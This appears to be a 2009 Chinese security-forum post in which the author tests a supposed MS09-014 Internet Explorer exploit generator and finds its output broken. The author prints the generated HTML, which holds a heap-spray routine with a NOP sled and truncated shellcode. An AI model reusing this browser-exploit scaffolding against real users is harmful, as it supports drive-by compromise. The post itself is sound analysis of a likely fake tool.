-
-
[讨论]ms09-014
-
发表于:
2009-6-8 17:12
4584
-
这几天ms09-014ie漏洞很热,所以本人也从网上下载一些相关文件来学习一下。
看到网上有一个银狐IE 0DAY网马生成器(Ms09-014)v1.0,随即下载它,想要测试一把。
使用生成器生成htm文件后,测试结果显示不成功。首先显示的是htm文件中的JavaScript语法错误。
在第十七行由于asMimeTypes不是数组,因此asMimeTypes.shift()调用失败。
那既然调用失败,那还溢出个什么。那这个什么网马生成器就是骗人的,只是用来宣传自己网站的。
还是小弟实在是技术浅薄,识别不出大师的精要。请大家讨论下。
下面是生成的htm文件中的内容,shellcode已经大部分删除,只剩开头的%u9090%u9090%ucccc%ue1d9
<BODY onload=go()></BODY>
<SCRIPT>
var asMimeTypes=unescape("%u9090%u9090%ucccc%ue1d9");
var svfox = unescape("%u9090%u9090");
while(svfox.length < 0x40000) { svfox += svfox; }
memory = new Array();
for(i = 0; i < 200; i++)
memory[i] = svfox + asMimeTypes;
function go() {
document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>";
setTimeout(go, 1);
}
</SCRIPT>
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!